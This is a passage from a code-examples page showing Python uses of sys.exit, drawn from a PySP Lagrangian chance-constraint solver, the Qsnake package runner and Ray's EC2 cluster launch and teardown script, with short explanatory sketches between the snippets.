# ...(b,z) is NOT an endpoint (or sufficiently close), so split and fathom
            if verbosity > 1:
               print("\tnot an endpoint\tlbz = %s" % str(Result.lbz[PRpoint]))
            if verbosity > 0:
               print("Lagangian solution is new PR point on line segment of (" \
                  + str(bL) + ", " + str(bU) +")")
               print("\tsplitting (bL,bU) into (bL,b) and (b,bU), both fathomed")
# note:  else ==> b = bL or bU, so we do nothing, having already fathomed [bL,bU]

# (b,z) is new PR point, so split interval (still in while loop)
##########################################
# alternative optimum ==> split & fathom: (bL,b), (b,bU)
         if verbosity > 1:
            print("\talternativeOpt %s newPRpoint = %s" % (alternativeOpt, newPRpoint))
         if newPRpoint:
            NumIntervals += 1
            if alternativeOpt:
               if verbosity > 1: print("\tInsert [lambdaval,b,z] at %f" % PRpoint)
               Result.lbz = Insert([lambdaval,b,z],PRpoint,Result.lbz)
               addstatus = "Added PR point on line segment of envelope"
               if verbosity > 0: print(addstatus+'\n')
            else:
               if verbosity > 1: print("\tInsert [None,b,z] at %f" % PRpoint)
               Result.lbz = Insert([None,b,z],PRpoint,Result.lbz)
               addstatus = "new envelope extreme point added (interval split, not fathomed)"
            Result.status = Result.status + "\n" + addstatus

            if verbosity > 1:
               print("...after insertion:")
               PrintPRpoints(Result.lbz)

# get the selections of new point (ie, scenarios for which delta=1)
            Selections = []
            for scenario in ScenarioList:
               instance = ph._instances[scenario[0]]
               if getattr(instance,IndVarName).value == 1:
                  Selections.append(scenario)
            Result.selections = Insert(Selections,PRpoint,Result.selections)

            if verbosity > 0:
               print("Interval "+str(PRpoint)+", ["+str(bL)+", "+str(bU)+ \
                 "] split at ("+str(b)+", "+str(z)+")")
               print("\tnew PR point has "+str(len(Selections))+" selections")

            if verbosity > 1: print("test that selections list aligned with lbz")
            if not len(Result.lbz) == len(Result.selections):
               print("** fatal error: lbz not= selections")
               PrintPRpoints(Result.lbz)
               print("Result.selections:")
               for i in range(len(Result.selections)): print("%d %s" % (i, Result.selections[i]))
               return Result

# ok, we have split and/or fathomed interval
         if NumIntervals >= maxIntervals:
# we are about to leave while loop due to...
            addstatus = "** terminating because number of intervals = " + \
                    str(NumIntervals) + " >= max = " + str(maxIntervals)
            if verbosity > 0: print(addstatus+'\n')
            Result.status = Result.status + "\n" + addstatus

# while loop continues
         if verbosity > 1:
            print("bottom of while loop")
            PrintPRpoints(Result.lbz)

###################################################
# end while NumIntervals < maxIntervals:
#     ^ this is indentation of while loop
################ end while loop ###################

      if verbosity > 1:  print("\nend while loop...setting multipliers")
      for i in range(1,len(Result.lbz)):
         db = Result.lbz[i][1] - Result.lbz[i-1][1]
         dz = Result.lbz[i][2] - Result.lbz[i-1][2]
         if dz > 0:
            Result.lbz[i][0] = dz/db
         else:
            #print "dz =",dz," at ",i,": ",Result.lbz[i]," -",Result.lbz[i-1]
            Result.lbz[i][0] = 0
      if verbosity > 0: PrintPRpoints(Result.lbz)

      addstatus = '\nLagrange multiplier search ends'+datetime_string()
      if verbosity > 0:
         print(addstatus+'\n')
      Result.status = Result.status + addstatus

      outName = csvPrefix + "PRoptimal.csv"
      with open(outName,'w') as outFile:
         if verbosity > 0:
            print("writing PR points to "+outName+'\n')
         for lbz in Result.lbz:
            outFile.write(str(lbz[1])+ ", " +str(lbz[2])+'\n')

      outName = csvPrefix + "OptimalSelections.csv"
      with open(outName,'w') as outFile:
         if verbosity > 0:
            print("writing optimal selections for each PR point to "+csvPrefix+'PRoptimal.csv\n')
         for selections in Result.selections:
            char = ""
            thisSelection = ""
            for slist in selections:
               if slist:
                  thisSelection = thisSelection + char + slist[0]
                  char = ","
            outFile.write(thisSelection+'\n')

      if verbosity > 0:
         print("\nReturning status:\n %s \n=======================" % Result.status)

################################
      if verbosity > 2:
         print("\nAbout to return...Result attributes: %d" % len(inspect.getmembers(Result)))
         for attr in inspect.getmembers(Result): print(attr[0])
         print("\n===========================================")
# LagrangeParametric ends here
      return Result
################################


####################################### start run ####################################

   AllInOne = False

########################
# options defined here
########################
   try:
      conf_options_parser = construct_ph_options_parser("lagrange [options]")
      conf_options_parser.add_argument("--beta-min",
                                     help="The min beta level for the chance constraint. Default is 0",
                                     action="store",
                                     dest="beta_min",
                                     type=float,
                                     default=0.)
      conf_options_parser.add_argument("--beta-max",
                                     help="The beta level for the chance constraint. Default is 1.",
                                     action="store",
                                     dest="beta_max",
                                     type=float,
                                     default=1.)
      conf_options_parser.add_argument("--beta-tol",
                                     help="Tolerance for testing equality to beta. Default is 1e-5",
                                     action="store",
                                     dest="beta_tol",
                                     type=float,
                                     default=1e-5)
      conf_options_parser.add_argument("--Lagrange-gap",
                                     help="The (relative) Lagrangian gap acceptable for the chance constraint. Default is 10^-4",
                                     action="store",
                                     type=float,
                                     dest="Lagrange_gap",
                                     default=0.0001)
      conf_options_parser.add_argument("--min-prob",
                                     help="Tolerance for testing probability > 0. Default is 1e-9",
                                     action="store",
                                     dest="min_prob",
                                     type=float,
                                     default=1e-5)
      conf_options_parser.add_argument("--max-intervals",
                                     help="The max number of intervals generated; if causes termination, non-fathomed intervals have multiplier=None.  Default = 100.",
                                     action="store",
                                     dest="max_intervals",
                                     type=int,
                                     default=100)
      conf_options_parser.add_argument("--max-time",
                                     help="Maximum time (seconds). Default is 3600.",
                                     action="store",
                                     dest="max_time",
                                     type=float,
                                     default=3600)
      conf_options_parser.add_argument("--lambda-parm-name",
                                     help="The name of the lambda parameter in the model. Default is lambdaMult",
                                     action="store",
                                     dest="lambda_parm_name",
                                     type=str,
                                     default="lambdaMult")
      conf_options_parser.add_argument("--indicator-var-name",
                                     help="The name of the indicator variable for the chance constraint. The default is delta",
                                     action="store",
                                     dest="indicator_var_name",
                                     type=str,
                                     default="delta")
      conf_options_parser.add_argument("--stage-num",
                                     help="The stage number of the CC indicator variable (number, not name). Default is 2",
                                     action="store",
                                     dest="stage_num",
                                     type=int,
                                     default=2)
      conf_options_parser.add_argument("--csvPrefix",
                                     help="Output file name.  Default is ''",
                                     action="store",
                                     dest="csvPrefix",
                                     type=str,
                                     default='')
      conf_options_parser.add_argument("--verbosity",
                                     help="verbosity=0 is no extra output, =1 is medium, =2 is debug, =3 super-debug. Default is 1.",
                                     action="store",
                                     dest="verbosity",
                                     type=int,
                                     default=1)
# The following needed for solve_ph_code in lagrangeutils
      conf_options_parser.add_argument("--solve-with-ph",
                                     help="Perform solves via PH rather than an EF solve. Default is False",
                                     action="store_true",
                                     dest="solve_with_ph",
                                     default=False)
##HG: deleted params filed as deletedParam.py
#######################################################################################################

      options = conf_options_parser.parse_args(args=args)
      # temporary hack
      options._ef_options = conf_options_parser._ef_options
      options._ef_options.import_argparse(options)
   except SystemExit as _exc:
      # the parser throws a system exit if "-h" is specified - catch
      # it to exit gracefully.
      return _exc.code

   # create the reference instances and the scenario tree - no
   # scenario instances yet.
   if options.verbosity > 0:
        print("Loading reference model and scenario tree")
# Dec 18
#   scenario_instance_factory, full_scenario_tree = load_models(options)
   scenario_instance_factory = \
        ScenarioTreeInstanceFactory(options.model_directory,
                                    options.instance_directory)

   full_scenario_tree = \
            GenerateScenarioTreeForPH(options,
                                      scenario_instance_factory)

####
   try:
      if (scenario_instance_factory is None) or (full_scenario_tree is None):
         raise RuntimeError("***ERROR: Failed to initialize the model and/or scenario tree data.")

      # load_model gets called again, so lets make sure unarchived directories are used
      options.model_directory = scenario_instance_factory._model_filename
      options.instance_directory = scenario_instance_factory._scenario_tree_filename

########## Here is where multiplier search is called from run() ############
      Result = LagrangeParametric()
#####################################################################################
   finally:

      # delete temporary unarchived directories
      scenario_instance_factory.close()

   if options.verbosity > 0:
      print("\n===========================================")
      print("\nreturned from LagrangeParametric")
      if options.verbosity > 2:
         print("\nFrom run, Result should have status and ph objects...")
         for attr in inspect.getmembers(Result): print(attr)
         print("\n===========================================")

   try:
      status = Result.status
      print("status = "+str(Result.status))
   except:
      print("status not defined")
      sys.exit()

   try:
      lbz = Result.lbz
      PrintPRpoints(lbz)
      with open(options.csvPrefix+"PRoptimal.csv",'w') as outFile:
         for lbz in Result.lbz:
            outFile.write(str(lbz[1])+ ", " +str(lbz[2])+'\n')
   except:
      print("Result.lbz not defined")
      sys.exit()

   try:
      ScenarioList = Result.ScenarioList
      ScenarioList.sort(key=operator.itemgetter(1))
      with open(options.csvPrefix+"ScenarioList.csv",'w') as outFile:
         for scenario in ScenarioList:
            outFile.write(scenario[0]+", "+str(scenario[1])+'\n')
   except:
      print("Result.ScenarioList not defined")
      sys.exit()
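
The pattern to note above: the options parser raises SystemExit (for example on -h), which the caller catches so it can return the exit code instead of killing the process, while a missing result attribute is reported and sys.exit() is called directly. A minimal sketch of that pattern, with hypothetical option and function names that are not taken from the project:

import argparse
import sys

def run(args=None):
    parser = argparse.ArgumentParser(prog="lagrange [options]")
    parser.add_argument("--verbosity", type=int, default=1)
    try:
        options = parser.parse_args(args=args)
    except SystemExit as exc:
        # argparse already printed help or an error; propagate its exit code.
        return exc.code
    if options.verbosity < 0:
        print("verbosity must be non-negative")
        sys.exit(1)  # abort with a non-zero status on invalid input
    return 0

if __name__ == "__main__":
    sys.exit(run())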

Example 5

Project: qsnake
Source File: qsnake_run.py
View license
def main():
    systemwide_python = (os.environ["QSNAKE_SYSTEMWIDE_PYTHON"] == "yes")
    if systemwide_python:
        print """\
***************************************************
Qsnake is not installed. Running systemwide Python.
Only use this mode to install Qsnake.
***************************************************"""

    parser = OptionParser(usage="""\
[options] [commands]

Commands:

  update                Updates the downloaded packages
  install PACKAGE       Installs the package 'PACKAGE'
  list                  Lists all installed packages
  test                  Runs the Qsnake testsuite
  develop               Equivalent of 'setup.py develop'""")
    parser.add_option("--version",
            action="store_true", dest="version",
            default=False, help="print Qsnake version and exit")
    parser.add_option("-v", "--verbose",
            action="store_true", dest="verbose",
            default=False, help="Make Qsnake verbose")
    parser.add_option("-i", "--install",
            action="store", type="str", dest="install", metavar="PACKAGE",
            default="", help="install a spkg package")
    parser.add_option("-f", "--force",
            action="store_true", dest="force",
            default=False, help="force the installation")
    parser.add_option("-d", "--download_packages",
            action="store_true", dest="download",
            default=False, help="download standard spkg packages")
    parser.add_option("-b", "--build",
            action="store_true", dest="build",
            default=False, help="build Qsnake")
    parser.add_option("-j",
            action="store", type="int", dest="cpu_count", metavar="NCPU",
            default=0, help="number of cpu to use (0 = all), default 0")
    parser.add_option("-s", "--shell",
            action="store_true", dest="shell",
            default=False, help="starts a Qsnake shell")
    parser.add_option("--script",
            action="store", type="str", dest="script", metavar="SCRIPT",
            default=None, help="runs '/bin/bash SCRIPT' in a Qsnake shell")
    # Not much used:
    #parser.add_option("--python",
    #        action="store", type="str", dest="python", metavar="SCRIPT",
    #        default=None, help="runs 'python SCRIPT' in a Qsnake shell")

    # These are not used either:
    #parser.add_option("--unpack",
    #        action="store", type="str", dest="unpack", metavar="PACKAGE",
    #        default=None, help="unpacks the PACKAGE into the 'devel/' dir")
    #parser.add_option("--pack",
    #        action="store", type="str", dest="pack", metavar="PACKAGE",
    #        default=None, help="creates 'devel/PACKAGE.spkg' from 'devel/PACKAGE'")
    #parser.add_option("--devel-install",
    #        action="store", type="str", dest="devel_install", metavar="PACKAGE",
    #        default=None, help="installs 'devel/PACKAGE' into Qsnake directly")
    parser.add_option("--create-package",
            action="store", type="str", dest="create_package",
            metavar="PACKAGE", default=None,
            help="creates 'PACKAGE.spkg' in the current directory using the official git repository sources")
    parser.add_option("--upload-package",
            action="store", type="str", dest="upload_package",
            metavar="PACKAGE", default=None,
            help="upload 'PACKAGE.spkg' from the current directory to the server (for Qsnake developers only)")
    parser.add_option("--release-binary",
            action="store_true", dest="release_binary",
            default=False, help="creates a binary release using the current state (for Qsnake developers only)")
    parser.add_option("--lab",
            action="store_true", dest="run_lab",
            default=False, help="runs lab()")
    parser.add_option("--verify-database",
            action="store_true", dest="verify_database",
            default=False,
            help="verifies the package database integrity")
    parser.add_option("--erase-binary",
            action="store_true", dest="erase_binary",
            default=False,
            help="erases all binaries (keeps downloads)")
    options, args = parser.parse_args()

    if options.verbose:
        global global_cmd_echo
        global_cmd_echo = True
    if len(args) == 1:
        arg, = args
        if arg == "update":
            command_update()
            return
        elif arg == "list":
            command_list()
            return
        elif arg == "develop":
            command_develop()
            return
        elif arg == "test":
            run_tests()
            return
        print "Unknown command"
        sys.exit(1)
    elif len(args) == 2:
        arg1, arg2 = args
        if arg1 == "install":
            try:
                install_package(arg2, cpu_count=options.cpu_count,
                        force_install=options.force)
            except PackageBuildFailed:
                print
                print "Package build failed."
            return
        print "Unknown command"
        sys.exit(1)
    elif len(args) == 0:
        pass
    else:
        print "Too many arguments"
        sys.exit(1)


    if options.download:
        download_packages()
        return
    if options.install:
        try:
            install_package(options.install, cpu_count=options.cpu_count,
                    force_install=options.force)
        except PackageBuildFailed:
            pass
        return
    if options.build:
        build(cpu_count=options.cpu_count)
        return
    if options.shell:
        print "Type CTRL-D to exit the Qsnake shell."
        cmd("cd $CUR; /bin/bash --rcfile $QSNAKE_ROOT/spkg/base/qsnake-shell-rc")
        return
    if options.script:
        setup_cpu(options.cpu_count)
        try:
            cmd("cd $CUR; /bin/bash " + options.script)
        except CmdException:
            print "Qsnake script exited with an error."
        return
    #if options.python:
    #    cmd("cd $CUR; /usr/bin/env python " + options.python)
    #    return
    #if options.unpack:
    #    pkg = pkg_make_absolute(options.unpack)
    #    print "Unpacking '%(pkg)s' into 'devel/'" % {"pkg": pkg}
    #    cmd("mkdir -p $QSNAKE_ROOT/devel")
    #    cmd("cd $QSNAKE_ROOT/devel; tar xjf %s" % pkg)
    #    return
    #if options.pack:
    #    dir = options.pack
    #    if not os.path.exists(dir):
    #        dir = expandvars("$QSNAKE_ROOT/devel/%s" % dir)
    #    if not os.path.exists(dir):
    #        raise Exception("Unknown package to pack")
    #    dir = os.path.split(dir)[1]
    #    print "Creating devel/%(dir)s.spkg from devel/%(dir)s" % {"dir": dir}
    #    cmd("cd $QSNAKE_ROOT/devel; tar cjf %(dir)s.spkg %(dir)s" % \
    #            {"dir": dir})
    #    return
    #if options.devel_install:
    #    dir = options.devel_install
    #    if not os.path.exists(dir):
    #        dir = expandvars("$QSNAKE_ROOT/devel/%s" % dir)
    #    if not os.path.exists(dir):
    #        raise Exception("Unknown package to pack")
    #    dir = os.path.normpath(dir)
    #    dir = os.path.split(dir)[1]
    #    print "Installing devel/%(dir)s into Qsnake" % {"dir": dir}
    #    cmd("mkdir -p $QSNAKE_ROOT/spkg/build/")
    #    cmd("rm -rf $QSNAKE_ROOT/spkg/build/%(dir)s" % {"dir": dir})
    #    cmd("cp -r $QSNAKE_ROOT/devel/%(dir)s $QSNAKE_ROOT/spkg/build/" % \
    #            {"dir": dir})
    #    setup_cpu(options.cpu_count)
    #    cmd("cd $QSNAKE_ROOT/spkg/build/%(dir)s; /bin/bash spkg-install" % \
    #            {"dir": dir})
    #    cmd("rm -rf $QSNAKE_ROOT/spkg/build/%(dir)s" % {"dir": dir})
    #    return
    if options.create_package:
        create_package(options.create_package)
        return
    if options.upload_package:
        upload_package(options.upload_package)
        return
    if options.release_binary:
        release_binary()
        return
    if options.run_lab:
        run_lab()
        return
    if options.verify_database:
        verify_database()
        return
    if options.erase_binary:
        erase_binary()
        return
    if options.version:
        show_version()
        return

    if systemwide_python:
        parser.print_help()
    else:
        start_qsnake()
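
Stripped to its essentials, the example above maps positional commands to handlers and calls sys.exit(1) whenever the command or the argument count is not recognized. A minimal Python 3 sketch of that dispatch-and-exit pattern (the command names and handlers are placeholders, not Qsnake's):

import sys

def dispatch(args):
    # Placeholder handlers; the real tool maps commands to install/update/etc.
    commands = {
        "update": lambda: print("updating packages..."),
        "list": lambda: print("listing installed packages..."),
    }
    if len(args) != 1:
        print("Too many arguments" if args else "No command given")
        sys.exit(1)  # unrecognized usage exits with a non-zero status
    handler = commands.get(args[0])
    if handler is None:
        print("Unknown command")
        sys.exit(1)
    handler()

if __name__ == "__main__":
    dispatch(sys.argv[1:])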

Example 6

Project: ray
Source File: ec2.py
View license
def launch_cluster(conn, opts, cluster_name):
    if opts.identity_file is None:
        print("ERROR: Must provide an identity file (-i) for ssh connections.", file=stderr)
        sys.exit(1)

    if opts.key_pair is None:
        print("ERROR: Must provide a key pair name (-k) to use on instances.", file=stderr)
        sys.exit(1)

    user_data_content = None

    print("Setting up security groups...")
    master_group = get_or_make_group(conn, cluster_name + "-master", opts.vpc_id)
    slave_group = get_or_make_group(conn, cluster_name + "-slaves", opts.vpc_id)
    authorized_address = opts.authorized_address
    if master_group.rules == []:  # Group was just now created
        master_group.authorize(src_group=master_group)
        master_group.authorize(src_group=slave_group)
        master_group.authorize('tcp', 22, 22, authorized_address)
    if slave_group.rules == []:  # Group was just now created
        slave_group.authorize(src_group=master_group)
        slave_group.authorize(src_group=slave_group)
        slave_group.authorize('tcp', 22, 22, authorized_address)

    # Check if instances are already running in our groups
    existing_masters, existing_slaves = get_existing_cluster(conn, opts, cluster_name,
                                                             die_on_error=False)
    if existing_slaves or (existing_masters and not opts.use_existing_master):
        print("ERROR: There are already instances running in group %s or %s" %
              (master_group.name, slave_group.name), file=stderr)
        sys.exit(1)

    # Use the default Ubuntu AMI.
    if opts.ami is None:
        if opts.region == "us-east-1":
            opts.ami = "ami-2d39803a"
        elif opts.region == "us-west-1":
            opts.ami = "ami-06116566"
        elif opts.region == "us-west-2":
            opts.ami = "ami-9abea4fb"
        elif opts.region == "eu-west-1":
            opts.ami = "ami-f95ef58a"
        elif opts.region == "eu-central-1":
            opts.ami = "ami-87564feb"
        elif opts.region == "ap-northeast-1":
            opts.ami = "ami-a21529cc"
        elif opts.region == "ap-northeast-2":
            opts.ami = "ami-09dc1267"
        elif opts.region == "ap-southeast-1":
            opts.ami = "ami-25c00c46"
        elif opts.region == "ap-southeast-2":
            opts.ami = "ami-6c14310f"
        elif opts.region == "ap-south-1":
            opts.ami = "ami-4a90fa25"
        elif opts.region == "sa-east-1":
            opts.ami = "ami-0fb83963"
        else:
          raise Exception("The specified region is unknown.")

    # we use group ids to work around https://github.com/boto/boto/issues/350
    additional_group_ids = []
    if opts.additional_security_group:
        additional_group_ids = [sg.id
                                for sg in conn.get_all_security_groups()
                                if opts.additional_security_group in (sg.name, sg.id)]
    print("Launching instances...")

    try:
        image = conn.get_all_images(image_ids=[opts.ami])[0]
    except:
        print("Could not find AMI " + opts.ami, file=stderr)
        sys.exit(1)

    # Create block device mapping so that we can add EBS volumes if asked to.
    # The first drive is attached as /dev/sds, 2nd as /dev/sdt, ... /dev/sdz
    block_map = BlockDeviceMapping()
    if opts.ebs_vol_size > 0:
        for i in range(opts.ebs_vol_num):
            device = EBSBlockDeviceType()
            device.size = opts.ebs_vol_size
            device.volume_type = opts.ebs_vol_type
            device.delete_on_termination = True
            block_map["/dev/sd" + chr(ord('s') + i)] = device

    # AWS ignores the AMI-specified block device mapping for M3 (see SPARK-3342).
    if opts.instance_type.startswith('m3.'):
        for i in range(get_num_disks(opts.instance_type)):
            dev = BlockDeviceType()
            dev.ephemeral_name = 'ephemeral%d' % i
            # The first ephemeral drive is /dev/sdb.
            name = '/dev/sd' + string.ascii_letters[i + 1]
            block_map[name] = dev

    # Launch slaves
    if opts.spot_price is not None:
        # Launch spot instances with the requested price
        print("Requesting %d slaves as spot instances with price $%.3f" %
              (opts.slaves, opts.spot_price))
        zones = get_zones(conn, opts)
        num_zones = len(zones)
        i = 0
        my_req_ids = []
        for zone in zones:
            num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
            slave_reqs = conn.request_spot_instances(
                price=opts.spot_price,
                image_id=opts.ami,
                launch_group="launch-group-%s" % cluster_name,
                placement=zone,
                count=num_slaves_this_zone,
                key_name=opts.key_pair,
                security_group_ids=[slave_group.id] + additional_group_ids,
                instance_type=opts.instance_type,
                block_device_map=block_map,
                subnet_id=opts.subnet_id,
                placement_group=opts.placement_group,
                user_data=user_data_content,
                instance_profile_name=opts.instance_profile_name)
            my_req_ids += [req.id for req in slave_reqs]
            i += 1

        print("Waiting for spot instances to be granted...")
        try:
            while True:
                time.sleep(10)
                reqs = conn.get_all_spot_instance_requests()
                id_to_req = {}
                for r in reqs:
                    id_to_req[r.id] = r
                active_instance_ids = []
                for i in my_req_ids:
                    if i in id_to_req and id_to_req[i].state == "active":
                        active_instance_ids.append(id_to_req[i].instance_id)
                if len(active_instance_ids) == opts.slaves:
                    print("All %d slaves granted" % opts.slaves)
                    reservations = conn.get_all_reservations(active_instance_ids)
                    slave_nodes = []
                    for r in reservations:
                        slave_nodes += r.instances
                    break
                else:
                    print("%d of %d slaves granted, waiting longer" % (
                        len(active_instance_ids), opts.slaves))
        except:
            print("Canceling spot instance requests")
            conn.cancel_spot_instance_requests(my_req_ids)
            # Log a warning if any of these requests actually launched instances:
            (master_nodes, slave_nodes) = get_existing_cluster(
                conn, opts, cluster_name, die_on_error=False)
            running = len(master_nodes) + len(slave_nodes)
            if running:
                print(("WARNING: %d instances are still running" % running), file=stderr)
            sys.exit(0)
    else:
        # Launch non-spot instances
        zones = get_zones(conn, opts)
        num_zones = len(zones)
        i = 0
        slave_nodes = []
        for zone in zones:
            num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
            if num_slaves_this_zone > 0:
                slave_res = image.run(
                    key_name=opts.key_pair,
                    security_group_ids=[slave_group.id] + additional_group_ids,
                    instance_type=opts.instance_type,
                    placement=zone,
                    min_count=num_slaves_this_zone,
                    max_count=num_slaves_this_zone,
                    block_device_map=block_map,
                    subnet_id=opts.subnet_id,
                    placement_group=opts.placement_group,
                    user_data=user_data_content,
                    instance_initiated_shutdown_behavior=opts.instance_initiated_shutdown_behavior,
                    instance_profile_name=opts.instance_profile_name)
                slave_nodes += slave_res.instances
                print("Launched {s} slave{plural_s} in {z}, regid = {r}".format(
                      s=num_slaves_this_zone,
                      plural_s=('' if num_slaves_this_zone == 1 else 's'),
                      z=zone,
                      r=slave_res.id))
            i += 1

    # Launch or resume masters
    if existing_masters:
        print("Starting master...")
        for inst in existing_masters:
            if inst.state not in ["shutting-down", "terminated"]:
                inst.start()
        master_nodes = existing_masters
    else:
        master_type = opts.master_instance_type
        if master_type == "":
            master_type = opts.instance_type
        if opts.zone == 'all':
            opts.zone = random.choice(conn.get_all_zones()).name
        master_res = image.run(
            key_name=opts.key_pair,
            security_group_ids=[master_group.id] + additional_group_ids,
            instance_type=master_type,
            placement=opts.zone,
            min_count=1,
            max_count=1,
            block_device_map=block_map,
            subnet_id=opts.subnet_id,
            placement_group=opts.placement_group,
            user_data=user_data_content,
            instance_initiated_shutdown_behavior=opts.instance_initiated_shutdown_behavior,
            instance_profile_name=opts.instance_profile_name)

        master_nodes = master_res.instances
        print("Launched master in %s, regid = %s" % (zone, master_res.id))

    # This wait time corresponds to SPARK-4983
    print("Waiting for AWS to propagate instance metadata...")
    time.sleep(15)

    # Give the instances descriptive names and set additional tags
    additional_tags = {}
    if opts.additional_tags.strip():
        additional_tags = dict(
            map(str.strip, tag.split(':', 1)) for tag in opts.additional_tags.split(',')
        )

    for master in master_nodes:
        master.add_tags(
            dict(additional_tags, Name='{cn}-master-{iid}'.format(cn=cluster_name, iid=master.id))
        )

    for slave in slave_nodes:
        slave.add_tags(
            dict(additional_tags, Name='{cn}-slave-{iid}'.format(cn=cluster_name, iid=slave.id))
        )

    # Return all the instances
    return (master_nodes, slave_nodes)
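
launch_cluster checks its required options before doing any work, writes errors to stderr, and exits with status 1; the spot-instance wait loop instead cancels the outstanding requests and exits with status 0 when it is interrupted. A condensed sketch of that validate-then-exit flow (the function signature and the cleanup step are illustrative, not the project's API):

import sys
from sys import stderr

def launch(identity_file, key_pair):
    # Required options are checked up front, before any cloud calls are made.
    if identity_file is None:
        print("ERROR: Must provide an identity file (-i) for ssh connections.", file=stderr)
        sys.exit(1)
    if key_pair is None:
        print("ERROR: Must provide a key pair name (-k) to use on instances.", file=stderr)
        sys.exit(1)
    try:
        print("Requesting instances...")  # stand-in for the real launch calls
        # ... wait here for the instances to become active ...
    except KeyboardInterrupt:
        print("Canceling pending requests")
        sys.exit(0)  # cleanup already happened, so exit with a success status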

Example 7

Project: ray
Source File: ec2.py
View license
def real_main():
    (opts, action, cluster_name) = parse_args()

    if opts.identity_file is not None:
        if not os.path.exists(opts.identity_file):
            print("ERROR: The identity file '{f}' doesn't exist.".format(f=opts.identity_file),
                  file=stderr)
            sys.exit(1)

        file_mode = os.stat(opts.identity_file).st_mode
        if not (file_mode & S_IRUSR) or not oct(file_mode)[-2:] == '00':
            print("ERROR: The identity file must be accessible only by you.", file=stderr)
            print('You can fix this with: chmod 400 "{f}"'.format(f=opts.identity_file),
                  file=stderr)
            sys.exit(1)

    if opts.instance_type not in EC2_INSTANCE_TYPES:
        print("Warning: Unrecognized EC2 instance type for instance-type: {t}".format(
              t=opts.instance_type), file=stderr)

    if opts.master_instance_type != "":
        if opts.master_instance_type not in EC2_INSTANCE_TYPES:
            print("Warning: Unrecognized EC2 instance type for master-instance-type: {t}".format(
                  t=opts.master_instance_type), file=stderr)
        # Since we try instance types even if we can't resolve them, we check if they resolve first
        # and, if they do, see if they resolve to the same virtualization type.
        if opts.instance_type in EC2_INSTANCE_TYPES and \
           opts.master_instance_type in EC2_INSTANCE_TYPES:
            if EC2_INSTANCE_TYPES[opts.instance_type] != \
               EC2_INSTANCE_TYPES[opts.master_instance_type]:
                print("Error: this script currently does not support having a master and slaves "
                      "with different AMI virtualization types.", file=stderr)
                print("master instance virtualization type: {t}".format(
                      t=EC2_INSTANCE_TYPES[opts.master_instance_type]), file=stderr)
                print("slave instance virtualization type: {t}".format(
                      t=EC2_INSTANCE_TYPES[opts.instance_type]), file=stderr)
                sys.exit(1)

    try:
        if opts.profile is None:
            conn = ec2.connect_to_region(opts.region)
        else:
            conn = ec2.connect_to_region(opts.region, profile_name=opts.profile)
    except Exception as e:
        print((e), file=stderr)
        sys.exit(1)

    # Select an AZ at random if it was not specified.
    if opts.zone == "":
        opts.zone = random.choice(conn.get_all_zones()).name

    if action == "launch":
        if opts.slaves <= 0:
            print("ERROR: You have to start at least 1 slave", file=sys.stderr)
            sys.exit(1)
        if opts.resume:
            (master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
        else:
            (master_nodes, slave_nodes) = launch_cluster(conn, opts, cluster_name)
        wait_for_cluster_state(
            conn=conn,
            opts=opts,
            cluster_instances=(master_nodes + slave_nodes),
            cluster_state='ssh-ready'
        )
        setup_cluster(conn, master_nodes, slave_nodes, opts, True)

        # Write the public and private ip addresses to a file.
        write_public_and_private_ip_addresses_to_file(master_nodes, slave_nodes)

    elif action == "destroy":
        (master_nodes, slave_nodes) = get_existing_cluster(
            conn, opts, cluster_name, die_on_error=False)

        if any(master_nodes + slave_nodes):
            print("The following instances will be terminated:")
            for inst in master_nodes + slave_nodes:
                print("> %s" % get_dns_name(inst, opts.private_ips))
            print("ALL DATA ON ALL NODES WILL BE LOST!!")

        msg = "Are you sure you want to destroy the cluster {c}? (y/N) ".format(c=cluster_name)
        response = raw_input(msg)
        if response == "y":
            print("Terminating master...")
            for inst in master_nodes:
                inst.terminate()
            print("Terminating slaves...")
            for inst in slave_nodes:
                inst.terminate()

            # Delete security groups as well
            if opts.delete_groups:
                group_names = [cluster_name + "-master", cluster_name + "-slaves"]
                wait_for_cluster_state(
                    conn=conn,
                    opts=opts,
                    cluster_instances=(master_nodes + slave_nodes),
                    cluster_state='terminated'
                )
                print("Deleting security groups (this will take some time)...")
                attempt = 1
                while attempt <= 3:
                    print("Attempt %d" % attempt)
                    groups = [g for g in conn.get_all_security_groups() if g.name in group_names]
                    success = True
                    # Delete individual rules in all groups before deleting groups to
                    # remove dependencies between them
                    for group in groups:
                        print("Deleting rules in security group " + group.name)
                        for rule in group.rules:
                            for grant in rule.grants:
                                success &= group.revoke(ip_protocol=rule.ip_protocol,
                                                        from_port=rule.from_port,
                                                        to_port=rule.to_port,
                                                        src_group=grant)

                    # Sleep for AWS eventual-consistency to catch up, and for instances
                    # to terminate
                    time.sleep(30)  # Yes, it does have to be this long :-(
                    for group in groups:
                        try:
                            # It is needed to use group_id to make it work with VPC
                            conn.delete_security_group(group_id=group.id)
                            print("Deleted security group %s" % group.name)
                        except boto.exception.EC2ResponseError:
                            success = False
                            print("Failed to delete security group %s" % group.name)

                    # Unfortunately, group.revoke() returns True even if a rule was not
                    # deleted, so this needs to be rerun if something fails
                    if success:
                        break

                    attempt += 1

                if not success:
                    print("Failed to delete all security groups after 3 tries.")
                    print("Try re-running in a few minutes.")

    elif action == "reboot-slaves":
        response = raw_input(
            "Are you sure you want to reboot the cluster " +
            cluster_name + " slaves?\n" +
            "Reboot cluster slaves " + cluster_name + " (y/N): ")
        if response == "y":
            (master_nodes, slave_nodes) = get_existing_cluster(
                conn, opts, cluster_name, die_on_error=False)
            print("Rebooting slaves...")
            for inst in slave_nodes:
                if inst.state not in ["shutting-down", "terminated"]:
                    print("Rebooting " + inst.id)
                    inst.reboot()

    elif action == "get-master":
        (master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
        if not master_nodes[0].public_dns_name and not opts.private_ips:
            print("Master has no public DNS name.  Maybe you meant to specify --private-ips?")
        else:
            print(get_dns_name(master_nodes[0], opts.private_ips))

    elif action == "stop":
        response = raw_input(
            "Are you sure you want to stop the cluster " +
            cluster_name + "?\nDATA ON EPHEMERAL DISKS WILL BE LOST, " +
            "BUT THE CLUSTER WILL KEEP USING SPACE ON\n" +
            "AMAZON EBS IF IT IS EBS-BACKED!!\n" +
            "All data on spot-instance slaves will be lost.\n" +
            "Stop cluster " + cluster_name + " (y/N): ")
        if response == "y":
            (master_nodes, slave_nodes) = get_existing_cluster(
                conn, opts, cluster_name, die_on_error=False)
            print("Stopping master...")
            for inst in master_nodes:
